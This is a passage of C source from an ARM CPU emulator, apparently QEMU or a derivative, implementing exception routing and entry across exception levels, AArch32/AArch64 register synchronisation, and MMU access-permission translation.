hcr_el2; if (arm_feature(env, ARM_FEATURE_EL3)) { rw = ((env->cp15.scr_el3 & SCR_RW) == SCR_RW); } else { /* Either EL2 is the highest EL (and so the EL2 register width * is given by is64); or there is no EL2 or EL3, in which case * the value of 'rw' does not affect the table lookup anyway. */ rw = is64; } hcr_el2 = arm_hcr_el2_eff(env); switch (excp_idx) { case EXCP_IRQ: scr = ((env->cp15.scr_el3 & SCR_IRQ) == SCR_IRQ); hcr = hcr_el2 & HCR_IMO; break; case EXCP_FIQ: scr = ((env->cp15.scr_el3 & SCR_FIQ) == SCR_FIQ); hcr = hcr_el2 & HCR_FMO; break; default: scr = ((env->cp15.scr_el3 & SCR_EA) == SCR_EA); hcr = hcr_el2 & HCR_AMO; break; }; /* * For these purposes, TGE and AMO/IMO/FMO both force the * interrupt to EL2. Fold TGE into the bit extracted above. */ hcr |= (hcr_el2 & HCR_TGE) != 0; /* Perform a table-lookup for the target EL given the current state */ target_el = target_el_table[is64][scr][rw][hcr][secure][cur_el]; assert(target_el > 0); return target_el; } /* * Function used to synchronize QEMU's AArch64 register set with AArch32 * register set. This is necessary when switching between AArch32 and AArch64 * execution state. */ void aarch64_sync_32_to_64(CPUARMState *env) { int i; uint32_t mode = env->uncached_cpsr & CPSR_M; /* We can blanket copy R[0:7] to X[0:7] */ for (i = 0; i < 8; i++) { env->xregs[i] = env->regs[i]; } /* * Unless we are in FIQ mode, x8-x12 come from the user registers r8-r12. * Otherwise, they come from the banked user regs. */ if (mode == ARM_CPU_MODE_FIQ) { for (i = 8; i < 13; i++) { env->xregs[i] = env->usr_regs[i - 8]; } } else { for (i = 8; i < 13; i++) { env->xregs[i] = env->regs[i]; } } /* * Registers x13-x23 are the various mode SP and FP registers. Registers * r13 and r14 are only copied if we are in that mode, otherwise we copy * from the mode banked register. */ if (mode == ARM_CPU_MODE_USR || mode == ARM_CPU_MODE_SYS) { env->xregs[13] = env->regs[13]; env->xregs[14] = env->regs[14]; } else { env->xregs[13] = env->banked_r13[bank_number(ARM_CPU_MODE_USR)]; /* HYP is an exception in that it is copied from r14 */ if (mode == ARM_CPU_MODE_HYP) { env->xregs[14] = env->regs[14]; } else { env->xregs[14] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_USR)]; } } if (mode == ARM_CPU_MODE_HYP) { env->xregs[15] = env->regs[13]; } else { env->xregs[15] = env->banked_r13[bank_number(ARM_CPU_MODE_HYP)]; } if (mode == ARM_CPU_MODE_IRQ) { env->xregs[16] = env->regs[14]; env->xregs[17] = env->regs[13]; } else { env->xregs[16] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_IRQ)]; env->xregs[17] = env->banked_r13[bank_number(ARM_CPU_MODE_IRQ)]; } if (mode == ARM_CPU_MODE_SVC) { env->xregs[18] = env->regs[14]; env->xregs[19] = env->regs[13]; } else { env->xregs[18] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_SVC)]; env->xregs[19] = env->banked_r13[bank_number(ARM_CPU_MODE_SVC)]; } if (mode == ARM_CPU_MODE_ABT) { env->xregs[20] = env->regs[14]; env->xregs[21] = env->regs[13]; } else { env->xregs[20] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_ABT)]; env->xregs[21] = env->banked_r13[bank_number(ARM_CPU_MODE_ABT)]; } if (mode == ARM_CPU_MODE_UND) { env->xregs[22] = env->regs[14]; env->xregs[23] = env->regs[13]; } else { env->xregs[22] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_UND)]; env->xregs[23] = env->banked_r13[bank_number(ARM_CPU_MODE_UND)]; } /* * Registers x24-x30 are mapped to r8-r14 in FIQ mode. If we are in FIQ * mode, then we can copy from r8-r14. Otherwise, we copy from the * FIQ bank for r8-r14. */ if (mode == ARM_CPU_MODE_FIQ) { for (i = 24; i < 31; i++) { env->xregs[i] = env->regs[i - 16]; /* X[24:30] <- R[8:14] */ } } else { for (i = 24; i < 29; i++) { env->xregs[i] = env->fiq_regs[i - 24]; } env->xregs[29] = env->banked_r13[bank_number(ARM_CPU_MODE_FIQ)]; env->xregs[30] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_FIQ)]; } env->pc = env->regs[15]; } /* * Function used to synchronize QEMU's AArch32 register set with AArch64 * register set. This is necessary when switching between AArch32 and AArch64 * execution state. */ void aarch64_sync_64_to_32(CPUARMState *env) { int i; uint32_t mode = env->uncached_cpsr & CPSR_M; /* We can blanket copy X[0:7] to R[0:7] */ for (i = 0; i < 8; i++) { env->regs[i] = env->xregs[i]; } /* * Unless we are in FIQ mode, r8-r12 come from the user registers x8-x12. * Otherwise, we copy x8-x12 into the banked user regs. */ if (mode == ARM_CPU_MODE_FIQ) { for (i = 8; i < 13; i++) { env->usr_regs[i - 8] = env->xregs[i]; } } else { for (i = 8; i < 13; i++) { env->regs[i] = env->xregs[i]; } } /* * Registers r13 & r14 depend on the current mode. * If we are in a given mode, we copy the corresponding x registers to r13 * and r14. Otherwise, we copy the x register to the banked r13 and r14 * for the mode. */ if (mode == ARM_CPU_MODE_USR || mode == ARM_CPU_MODE_SYS) { env->regs[13] = env->xregs[13]; env->regs[14] = env->xregs[14]; } else { env->banked_r13[bank_number(ARM_CPU_MODE_USR)] = env->xregs[13]; /* * HYP is an exception in that it does not have its own banked r14 but * shares the USR r14 */ if (mode == ARM_CPU_MODE_HYP) { env->regs[14] = env->xregs[14]; } else { env->banked_r14[r14_bank_number(ARM_CPU_MODE_USR)] = env->xregs[14]; } } if (mode == ARM_CPU_MODE_HYP) { env->regs[13] = env->xregs[15]; } else { env->banked_r13[bank_number(ARM_CPU_MODE_HYP)] = env->xregs[15]; } if (mode == ARM_CPU_MODE_IRQ) { env->regs[14] = env->xregs[16]; env->regs[13] = env->xregs[17]; } else { env->banked_r14[r14_bank_number(ARM_CPU_MODE_IRQ)] = env->xregs[16]; env->banked_r13[bank_number(ARM_CPU_MODE_IRQ)] = env->xregs[17]; } if (mode == ARM_CPU_MODE_SVC) { env->regs[14] = env->xregs[18]; env->regs[13] = env->xregs[19]; } else { env->banked_r14[r14_bank_number(ARM_CPU_MODE_SVC)] = env->xregs[18]; env->banked_r13[bank_number(ARM_CPU_MODE_SVC)] = env->xregs[19]; } if (mode == ARM_CPU_MODE_ABT) { env->regs[14] = env->xregs[20]; env->regs[13] = env->xregs[21]; } else { env->banked_r14[r14_bank_number(ARM_CPU_MODE_ABT)] = env->xregs[20]; env->banked_r13[bank_number(ARM_CPU_MODE_ABT)] = env->xregs[21]; } if (mode == ARM_CPU_MODE_UND) { env->regs[14] = env->xregs[22]; env->regs[13] = env->xregs[23]; } else { env->banked_r14[r14_bank_number(ARM_CPU_MODE_UND)] = env->xregs[22]; env->banked_r13[bank_number(ARM_CPU_MODE_UND)] = env->xregs[23]; } /* Registers x24-x30 are mapped to r8-r14 in FIQ mode. If we are in FIQ * mode, then we can copy to r8-r14. Otherwise, we copy to the * FIQ bank for r8-r14. */ if (mode == ARM_CPU_MODE_FIQ) { for (i = 24; i < 31; i++) { env->regs[i - 16] = env->xregs[i]; /* X[24:30] -> R[8:14] */ } } else { for (i = 24; i < 29; i++) { env->fiq_regs[i - 24] = env->xregs[i]; } env->banked_r13[bank_number(ARM_CPU_MODE_FIQ)] = env->xregs[29]; env->banked_r14[r14_bank_number(ARM_CPU_MODE_FIQ)] = env->xregs[30]; } env->regs[15] = env->pc; } static void take_aarch32_exception(CPUARMState *env, int new_mode, uint32_t mask, uint32_t offset, uint32_t newpc) { int new_el; /* Change the CPU state so as to actually take the exception. */ switch_mode(env, new_mode); /* * For exceptions taken to AArch32 we must clear the SS bit in both * PSTATE and in the old-state value we save to SPSR_<mode>, so zero it now. */ env->uncached_cpsr &= ~PSTATE_SS; env->spsr = cpsr_read(env); /* Clear IT bits. */ env->condexec_bits = 0; /* Switch to the new mode, and to the correct instruction set. */ env->uncached_cpsr = (env->uncached_cpsr & ~CPSR_M) | new_mode; /* This must be after mode switching. */ new_el = arm_current_el(env); /* Set new mode endianness */ env->uncached_cpsr &= ~CPSR_E; if (env->cp15.sctlr_el[new_el] & SCTLR_EE) { env->uncached_cpsr |= CPSR_E; } /* J and IL must always be cleared for exception entry */ env->uncached_cpsr &= ~(CPSR_IL | CPSR_J); env->daif |= mask; if (new_mode == ARM_CPU_MODE_HYP) { env->thumb = (env->cp15.sctlr_el[2] & SCTLR_TE) != 0; env->elr_el[2] = env->regs[15]; } else { /* CPSR.PAN is normally preserved preserved unless... */ if (cpu_isar_feature(aa32_pan, env_archcpu(env))) { switch (new_el) { case 3: if (!arm_is_secure_below_el3(env)) { /* ... the target is EL3, from non-secure state. */ env->uncached_cpsr &= ~CPSR_PAN; break; } /* ... the target is EL3, from secure state ... */ /* fall through */ case 1: /* ... the target is EL1 and SCTLR.SPAN is 0. */ if (!(env->cp15.sctlr_el[new_el] & SCTLR_SPAN)) { env->uncached_cpsr |= CPSR_PAN; } break; } } /* * this is a lie, as there was no c1_sys on V4T/V5, but who cares * and we should just guard the thumb mode on V4 */ if (arm_feature(env, ARM_FEATURE_V4T)) { env->thumb = (A32_BANKED_CURRENT_REG_GET(env, sctlr) & SCTLR_TE) != 0; } env->regs[14] = env->regs[15] + offset; } env->regs[15] = newpc; arm_rebuild_hflags(env); } static void arm_cpu_do_interrupt_aarch32_hyp(CPUState *cs) { /* * Handle exception entry to Hyp mode; this is sufficiently * different to entry to other AArch32 modes that we handle it * separately here. * * The vector table entry used is always the 0x14 Hyp mode entry point, * unless this is an UNDEF/HVC/abort taken from Hyp to Hyp. * The offset applied to the preferred return address is always zero * (see DDI0487C.a section G1.12.3). * PSTATE A/I/F masks are set based only on the SCR.EA/IRQ/FIQ values. */ uint32_t addr, mask; ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; switch (cs->exception_index) { case EXCP_UDEF: addr = 0x04; break; case EXCP_SWI: addr = 0x14; break; case EXCP_BKPT: /* Fall through to prefetch abort. */ case EXCP_PREFETCH_ABORT: env->cp15.ifar_s = env->exception.vaddress; qemu_log_mask(CPU_LOG_INT, "...with HIFAR 0x%x\n", (uint32_t)env->exception.vaddress); addr = 0x0c; break; case EXCP_DATA_ABORT: env->cp15.dfar_s = env->exception.vaddress; qemu_log_mask(CPU_LOG_INT, "...with HDFAR 0x%x\n", (uint32_t)env->exception.vaddress); addr = 0x10; break; case EXCP_IRQ: addr = 0x18; break; case EXCP_FIQ: addr = 0x1c; break; case EXCP_HVC: addr = 0x08; break; case EXCP_HYP_TRAP: addr = 0x14; break; default: cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); } if (cs->exception_index != EXCP_IRQ && cs->exception_index != EXCP_FIQ) { if (!arm_feature(env, ARM_FEATURE_V8)) { /* * QEMU syndrome values are v8-style. v7 has the IL bit * UNK/SBZP for "field not valid" cases, where v8 uses RES1. * If this is a v7 CPU, squash the IL bit in those cases. */ if (cs->exception_index == EXCP_PREFETCH_ABORT || (cs->exception_index == EXCP_DATA_ABORT && !(env->exception.syndrome & ARM_EL_ISV)) || syn_get_ec(env->exception.syndrome) == EC_UNCATEGORIZED) { env->exception.syndrome &= ~ARM_EL_IL; } } env->cp15.esr_el[2] = env->exception.syndrome; } if (arm_current_el(env) != 2 && addr < 0x14) { addr = 0x14; } mask = 0; if (!(env->cp15.scr_el3 & SCR_EA)) { mask |= CPSR_A; } if (!(env->cp15.scr_el3 & SCR_IRQ)) { mask |= CPSR_I; } if (!(env->cp15.scr_el3 & SCR_FIQ)) { mask |= CPSR_F; } addr += env->cp15.hvbar; take_aarch32_exception(env, ARM_CPU_MODE_HYP, mask, 0, addr); } static void arm_cpu_do_interrupt_aarch32_qemu(CPUState *cs) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; uint32_t addr; uint32_t mask; int new_mode; uint32_t offset; uint32_t moe; /* If this is a debug exception we must update the DBGDSCR.MOE bits */ switch (syn_get_ec(env->exception.syndrome)) { case EC_BREAKPOINT: case EC_BREAKPOINT_SAME_EL: moe = 1; break; case EC_WATCHPOINT: case EC_WATCHPOINT_SAME_EL: moe = 10; break; case EC_AA32_BKPT: moe = 3; break; case EC_VECTORCATCH: moe = 5; break; default: moe = 0; break; } if (moe) { env->cp15.mdscr_el1 = deposit64(env->cp15.mdscr_el1, 2, 4, moe); } if (env->exception.target_el == 2) { arm_cpu_do_interrupt_aarch32_hyp(cs); return; } switch (cs->exception_index) { case EXCP_UDEF: new_mode = ARM_CPU_MODE_UND; addr = 0x04; mask = CPSR_I; if (env->thumb) offset = 2; else offset = 4; break; case EXCP_SWI: new_mode = ARM_CPU_MODE_SVC; addr = 0x08; mask = CPSR_I; /* The PC already points to the next instruction. */ offset = 0; break; case EXCP_BKPT: /* Fall through to prefetch abort. */ case EXCP_PREFETCH_ABORT: A32_BANKED_CURRENT_REG_SET(env, ifsr, env->exception.fsr); A32_BANKED_CURRENT_REG_SET(env, ifar, env->exception.vaddress); qemu_log_mask(CPU_LOG_INT, "...with IFSR 0x%x IFAR 0x%x\n", env->exception.fsr, (uint32_t)env->exception.vaddress); new_mode = ARM_CPU_MODE_ABT; addr = 0x0c; mask = CPSR_A | CPSR_I; offset = 4; break; case EXCP_DATA_ABORT: A32_BANKED_CURRENT_REG_SET(env, dfsr, env->exception.fsr); A32_BANKED_CURRENT_REG_SET(env, dfar, env->exception.vaddress); qemu_log_mask(CPU_LOG_INT, "...with DFSR 0x%x DFAR 0x%x\n", env->exception.fsr, (uint32_t)env->exception.vaddress); new_mode = ARM_CPU_MODE_ABT; addr = 0x10; mask = CPSR_A | CPSR_I; offset = 8; break; case EXCP_IRQ: new_mode = ARM_CPU_MODE_IRQ; addr = 0x18; /* Disable IRQ and imprecise data aborts. */ mask = CPSR_A | CPSR_I; offset = 4; if (env->cp15.scr_el3 & SCR_IRQ) { /* IRQ routed to monitor mode */ new_mode = ARM_CPU_MODE_MON; mask |= CPSR_F; } break; case EXCP_FIQ: new_mode = ARM_CPU_MODE_FIQ; addr = 0x1c; /* Disable FIQ, IRQ and imprecise data aborts. */ mask = CPSR_A | CPSR_I | CPSR_F; if (env->cp15.scr_el3 & SCR_FIQ) { /* FIQ routed to monitor mode */ new_mode = ARM_CPU_MODE_MON; } offset = 4; break; case EXCP_VIRQ: new_mode = ARM_CPU_MODE_IRQ; addr = 0x18; /* Disable IRQ and imprecise data aborts. */ mask = CPSR_A | CPSR_I; offset = 4; break; case EXCP_VFIQ: new_mode = ARM_CPU_MODE_FIQ; addr = 0x1c; /* Disable FIQ, IRQ and imprecise data aborts. */ mask = CPSR_A | CPSR_I | CPSR_F; offset = 4; break; case EXCP_SMC: new_mode = ARM_CPU_MODE_MON; addr = 0x08; mask = CPSR_A | CPSR_I | CPSR_F; offset = 0; break; default: cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); return; /* Never happens. Keep compiler happy. */ } if (new_mode == ARM_CPU_MODE_MON) { addr += env->cp15.mvbar; } else if (A32_BANKED_CURRENT_REG_GET(env, sctlr) & SCTLR_V) { /* High vectors. When enabled, base address cannot be remapped. */ addr += 0xffff0000; } else { /* ARM v7 architectures provide a vector base address register to remap * the interrupt vector table. * This register is only followed in non-monitor mode, and is banked. * Note: only bits 31:5 are valid. */ addr += A32_BANKED_CURRENT_REG_GET(env, vbar); } if ((env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_MON) { env->cp15.scr_el3 &= ~SCR_NS; } take_aarch32_exception(env, new_mode, mask, offset, addr); } /* Handle exception entry to a target EL which is using AArch64 */ static void arm_cpu_do_interrupt_aarch64_qemu(CPUState *cs) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; unsigned int new_el = env->exception.target_el; target_ulong addr = env->cp15.vbar_el[new_el]; unsigned int new_mode = aarch64_pstate_mode(new_el, true); unsigned int old_mode; unsigned int cur_el = arm_current_el(env); /* * Note that new_el can never be 0. If cur_el is 0, then * el0_a64 is is_a64(), else el0_a64 is ignored. */ aarch64_sve_change_el(env, cur_el, new_el, is_a64(env)); if (cur_el < new_el) { /* Entry vector offset depends on whether the implemented EL * immediately lower than the target level is using AArch32 or AArch64 */ bool is_aa64 = false; uint64_t hcr; switch (new_el) { case 3: is_aa64 = (env->cp15.scr_el3 & SCR_RW) != 0; break; case 2: hcr = arm_hcr_el2_eff(env); if ((hcr & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE)) { is_aa64 = (hcr & HCR_RW) != 0; break; } /* fall through */ case 1: is_aa64 = is_a64(env); break; default: g_assert_not_reached(); break; } if (is_aa64) { addr += 0x400; } else { addr += 0x600; } } else if (pstate_read(env) & PSTATE_SP) { addr += 0x200; } switch (cs->exception_index) { case EXCP_PREFETCH_ABORT: case EXCP_DATA_ABORT: env->cp15.far_el[new_el] = env->exception.vaddress; qemu_log_mask(CPU_LOG_INT, "...with FAR 0x%" PRIx64 "\n", env->cp15.far_el[new_el]); /* fall through */ case EXCP_BKPT: case EXCP_UDEF: case EXCP_SWI: case EXCP_HVC: case EXCP_HYP_TRAP: case EXCP_SMC: if (syn_get_ec(env->exception.syndrome) == EC_ADVSIMDFPACCESSTRAP) { /* * QEMU internal FP/SIMD syndromes from AArch32 include the * TA and coproc fields which are only exposed if the exception * is taken to AArch32 Hyp mode. Mask them out to get a valid * AArch64 format syndrome. */ env->exception.syndrome &= ~MAKE_64BIT_MASK(0, 20); } env->cp15.esr_el[new_el] = env->exception.syndrome; break; case EXCP_IRQ: case EXCP_VIRQ: addr += 0x80; break; case EXCP_FIQ: case EXCP_VFIQ: addr += 0x100; break; default: cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); } if (is_a64(env)) { old_mode = pstate_read(env); aarch64_save_sp(env, arm_current_el(env)); env->elr_el[new_el] = env->pc; } else { old_mode = cpsr_read(env); env->elr_el[new_el] = env->regs[15]; aarch64_sync_32_to_64(env); env->condexec_bits = 0; } env->banked_spsr[aarch64_banked_spsr_index(new_el)] = old_mode; qemu_log_mask(CPU_LOG_INT, "...with ELR 0x%" PRIx64 "\n", env->elr_el[new_el]); if (cpu_isar_feature(aa64_pan, cpu)) { /* The value of PSTATE.PAN is normally preserved, except when ... */ new_mode |= old_mode & PSTATE_PAN; switch (new_el) { case 2: /* ... the target is EL2 with HCR_EL2.{E2H,TGE} == '11' ... */ if ((arm_hcr_el2_eff(env) & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE)) { break; } /* fall through */ case 1: /* ... the target is EL1 ... */ /* ... and SCTLR_ELx.SPAN == 0, then set to 1. */ if ((env->cp15.sctlr_el[new_el] & SCTLR_SPAN) == 0) { new_mode |= PSTATE_PAN; } break; } } pstate_write(env, PSTATE_DAIF | new_mode); env->aarch64 = 1; aarch64_restore_sp(env, new_el); helper_rebuild_hflags_a64(env, new_el); env->pc = addr; qemu_log_mask(CPU_LOG_INT, "...to EL%d PC 0x%" PRIx64 " PSTATE 0x%x\n", new_el, env->pc, pstate_read(env)); } /* Handle a CPU exception for A and R profile CPUs. * Do any appropriate logging, handle PSCI calls, and then hand off * to the AArch64-entry or AArch32-entry function depending on the * target exception level's register width. */ void arm_cpu_do_interrupt(CPUState *cs) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; unsigned int new_el = env->exception.target_el; assert(!arm_feature(env, ARM_FEATURE_M)); if (arm_is_psci_call(cpu, cs->exception_index)) { arm_handle_psci_call(cpu); return; } /* * Semihosting semantics depend on the register width of the code * that caused the exception, not the target exception level, so * must be handled here. */ if (cs->exception_index == EXCP_SEMIHOST) { // handle_semihosting(cs); return; } /* Hooks may change global state so BQL should be held, also the * BQL needs to be held for any modification of * cs->interrupt_request. */ arm_call_pre_el_change_hook(cpu); assert(!excp_is_internal(cs->exception_index)); if (arm_el_is_aa64(env, new_el)) { arm_cpu_do_interrupt_aarch64_qemu(cs); } else { arm_cpu_do_interrupt_aarch32_qemu(cs); } arm_call_el_change_hook(cpu); cs->interrupt_request |= CPU_INTERRUPT_EXITTB; } /* Return the exception level which controls this address translation regime */ static uint32_t regime_el(CPUARMState *env, ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_E20_0: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: case ARMMMUIdx_Stage2: case ARMMMUIdx_E2: return 2; case ARMMMUIdx_SE3: return 3; case ARMMMUIdx_SE10_0: return arm_el_is_aa64(env, 3) ? 1 : 3; case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: case ARMMMUIdx_Stage1_E0: case ARMMMUIdx_Stage1_E1: case ARMMMUIdx_Stage1_E1_PAN: case ARMMMUIdx_E10_0: case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_MPrivNegPri: case ARMMMUIdx_MUserNegPri: case ARMMMUIdx_MPriv: case ARMMMUIdx_MUser: case ARMMMUIdx_MSPrivNegPri: case ARMMMUIdx_MSUserNegPri: case ARMMMUIdx_MSPriv: case ARMMMUIdx_MSUser: return 1; default: g_assert_not_reached(); // never reach here return 1; } } uint64_t arm_sctlr(CPUARMState *env, int el) { /* Only EL0 needs to be adjusted for EL1&0 or EL2&0. */ if (el == 0) { ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, 0); el = (mmu_idx == ARMMMUIdx_E20_0 ? 2 : 1); } return env->cp15.sctlr_el[el]; } /* Return the SCTLR value which controls this address translation regime */ static inline uint64_t regime_sctlr(CPUARMState *env, ARMMMUIdx mmu_idx) { return env->cp15.sctlr_el[regime_el(env, mmu_idx)]; } /* Return true if the specified stage of address translation is disabled */ static inline bool regime_translation_disabled(CPUARMState *env, ARMMMUIdx mmu_idx) { if (arm_feature(env, ARM_FEATURE_M)) { switch (env->v7m.mpu_ctrl[regime_is_secure(env, mmu_idx)] & (R_V7M_MPU_CTRL_ENABLE_MASK | R_V7M_MPU_CTRL_HFNMIENA_MASK)) { case R_V7M_MPU_CTRL_ENABLE_MASK: /* Enabled, but not for HardFault and NMI */ return mmu_idx & ARM_MMU_IDX_M_NEGPRI; case R_V7M_MPU_CTRL_ENABLE_MASK | R_V7M_MPU_CTRL_HFNMIENA_MASK: /* Enabled for all cases */ return false; case 0: default: /* HFNMIENA set and ENABLE clear is UNPREDICTABLE, but * we warned about that in armv7m_nvic.c when the guest set it. */ return true; } } if (mmu_idx == ARMMMUIdx_Stage2) { /* HCR.DC means HCR.VM behaves as 1 */ return (env->cp15.hcr_el2 & (HCR_DC | HCR_VM)) == 0; } if (env->cp15.hcr_el2 & HCR_TGE) { /* TGE means that NS EL0/1 act as if SCTLR_EL1.M is zero */ if (!regime_is_secure(env, mmu_idx) && regime_el(env, mmu_idx) == 1) { return true; } } if ((env->cp15.hcr_el2 & HCR_DC) && arm_mmu_idx_is_stage1_of_2(mmu_idx)) { /* HCR.DC means SCTLR_EL1.M behaves as 0 */ return true; } return (regime_sctlr(env, mmu_idx) & SCTLR_M) == 0; } static inline bool regime_translation_big_endian(CPUARMState *env, ARMMMUIdx mmu_idx) { return (regime_sctlr(env, mmu_idx) & SCTLR_EE) != 0; } /* Return the TTBR associated with this translation regime */ static inline uint64_t regime_ttbr(CPUARMState *env, ARMMMUIdx mmu_idx, int ttbrn) { if (mmu_idx == ARMMMUIdx_Stage2) { return env->cp15.vttbr_el2; } if (ttbrn == 0) { return env->cp15.ttbr0_el[regime_el(env, mmu_idx)]; } else { return env->cp15.ttbr1_el[regime_el(env, mmu_idx)]; } } /* Return the TCR controlling this translation regime */ static inline TCR *regime_tcr(CPUARMState *env, ARMMMUIdx mmu_idx) { if (mmu_idx == ARMMMUIdx_Stage2) { return &env->cp15.vtcr_el2; } return &env->cp15.tcr_el[regime_el(env, mmu_idx)]; } /* Convert a possible stage1+2 MMU index into the appropriate * stage 1 MMU index */ static inline ARMMMUIdx stage_1_mmu_idx(ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_E10_0: return ARMMMUIdx_Stage1_E0; case ARMMMUIdx_E10_1: return ARMMMUIdx_Stage1_E1; case ARMMMUIdx_E10_1_PAN: return ARMMMUIdx_Stage1_E1_PAN; default: return mmu_idx; } } /* Return true if the translation regime is using LPAE format page tables */ static inline bool regime_using_lpae_format(CPUARMState *env, ARMMMUIdx mmu_idx) { int el = regime_el(env, mmu_idx); if (el == 2 || arm_el_is_aa64(env, el)) { return true; } if (arm_feature(env, ARM_FEATURE_LPAE) && (regime_tcr(env, mmu_idx)->raw_tcr & TTBCR_EAE)) { return true; } return false; } /* Returns true if the stage 1 translation regime is using LPAE format page * tables. Used when raising alignment exceptions, whose FSR changes depending * on whether the long or short descriptor format is in use. */ bool arm_s1_regime_using_lpae_format(CPUARMState *env, ARMMMUIdx mmu_idx) { mmu_idx = stage_1_mmu_idx(mmu_idx); return regime_using_lpae_format(env, mmu_idx); } static inline bool regime_is_user(CPUARMState *env, ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_SE10_0: case ARMMMUIdx_E20_0: case ARMMMUIdx_Stage1_E0: case ARMMMUIdx_MUser: case ARMMMUIdx_MSUser: case ARMMMUIdx_MUserNegPri: case ARMMMUIdx_MSUserNegPri: return true; default: return false; case ARMMMUIdx_E10_0: case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: g_assert_not_reached(); // never reach here return false; } } /* Translate section/page access permissions to page * R/W protection flags * * @env: CPUARMState * @mmu_idx: MMU index indicating required translation regime * @ap: The 3-bit access permissions (AP[2:0]) * @domain_prot: The 2-bit domain access permissions */ static inline int ap_to_rw_prot(CPUARMState *env, ARMMMUIdx mmu_idx, int ap, int domain_prot) { bool is_user = regime_is_user(env, mmu_idx); if (domain_prot == 3) { return PAGE_READ | PAGE_WRITE; } switch (ap) { case 0: if (arm_feature(env, ARM_FEATURE_V7)) { return 0; } switch (regime_sctlr(env, mmu_idx) & (SCTLR_S | SCTLR_R)) { case SCTLR_S: return is_user ? 0 : PAGE_READ; case SCTLR_R: return PAGE_READ; default: return 0; } case 1: return is_user ? 0 : PAGE_READ | PAGE_WRITE; case 2: if (is_user) { return PAGE_READ; } else { return PAGE_READ | PAGE_WRITE; } case 3: return PAGE_READ | PAGE_WRITE; case 4: /* Reserved. */ return 0; case 5: return is_user ? 0 : PAGE_READ; case 6: return PAGE_READ; case 7: if (!arm_feature(env, ARM_FEATURE_V6K)) { return 0; } return PAGE_READ; default: g_assert_not_reached(); // never reach here return PAGE_READ; } } /* Translate section/page access permissions to page * R/W protection flags. * * @ap: The 2-bit simple AP (AP[2:1]) * @is_user: TRUE if accessing from PL0 */ static inline int simple_ap_to_rw_prot_is_user(int ap, bool is_user) { switch (ap) { case 0: return is_user ? 0 : PAGE_READ | PAGE_WRITE; case 1: return PAGE_READ | PAGE_WRITE; case 2: return is_user ? 0 : PAGE_READ; case 3: return PAGE_READ; default: g_assert_not_reached(); // never reach here return PAGE_READ; } } static inline int simple_ap_to_rw_prot(CPUARMState *env, ARMMMUIdx mmu_idx, int ap) { return simple_ap_to_rw_prot_is_user(ap, regime_is_user(env, mmu_idx)); } /* Translate S2 section/page access permissions to protection flags * * @env: CPUARMState * @s2ap: The 2-bit stage2 access permissions (S2AP) * @xn: XN (execute-never) bit */ static int get_S2prot(CPUARMState *env, int s2ap, int xn) { int prot = 0; if (s2ap & 1) { prot |= PAGE_READ; } if (s2ap & 2) { prot |= PAGE_WRITE; } if (!xn) { if (arm_el_is_aa64(env, 2) || prot & PAGE_READ) { prot |= PAGE_EXEC; } } return prot; } /* Translate section/page access permissions to protection flags * * @env: CPUARMState * @mmu_idx: MMU index indicating required translation regime * @is_aa64: TRUE if AArch64 * @ap: The 2-bit simple AP (AP[2:1]) * @ns: NS (non-secure) bit * @xn: XN (execute-never) bit * @pxn: PXN (privileged execute-never) bit */ static int get_S1prot(CPUARMState *env, ARMMMUIdx mmu_idx, bool is_aa64, int ap, int ns, int xn, int pxn) { bool is_user = regime_is_user(env, mmu_idx); int prot_rw, user_rw; bool have_wxn; int wxn = 0; assert(mmu_idx != ARMMMUIdx_Stage2); user_rw = simple_ap_to_rw_prot_is_user(ap, true); if (is_user) { prot_rw = user_rw; } else { if (user_rw && regime_is_pan(env, mmu_idx)) { /* PAN forbids data accesses but doesn't affect insn fetch */ prot_rw = 0; } else { prot_rw = simple_ap_to_rw_prot_is_user(ap, false); } } if (ns && arm_is_secure(env) && (env->cp15.scr_el3 & SCR_SIF)) { return prot_rw; } /* TODO have_wxn should be replaced with * ARM_FEATURE_V8 || (ARM_FEATURE_V7 && ARM_FEATURE_EL2) * when ARM_FEATURE_EL2 starts getting set. For now we assume all LPAE * compatible processors have EL2, which is required for [U]WXN. */ have_wxn = arm_feature(env, ARM_FEATURE_LPAE); if (have_wxn) { wxn = regime_sctlr(env, mmu_idx) & SCTLR_WXN; } if (is_aa64) { if (regime_has_2_ranges(mmu_idx) && !is_user) { xn = pxn || (user_rw & PAGE_WRITE); } } else if (arm_feature(env, ARM_FEATURE_V7)) { switch (regime_el(env, mmu_idx)) { case 1: case 3: if (is_user) { xn = xn || !(user_rw & PAGE_READ); } else { int uwxn = 0; if (have_wxn) { uwxn = regime_sctlr(env, mmu_idx) & SCTLR_UWXN; } xn = xn || !(prot_rw & PAGE_READ) || pxn || (uwxn && (user_rw & PAGE_WRITE)); } break; case 2: break; } } else { xn = wxn = 0; } if (xn || (wxn && (prot_rw & PAGE_WRITE))) { return prot_rw; } return prot_rw | PAGE_EXEC; } static bool get_level1_table_address(CPUARMState *env, ARMMMUIdx mmu_idx, uint32_t *table, uint32_t address) { /* Note that we can only get here for an AArch32 PL0/PL1 lookup */ TCR *tcr = regime_tcr(env, mmu_idx); if (address & tcr->mask) { if (tcr->raw_tcr & TTBCR_PD1) { /* 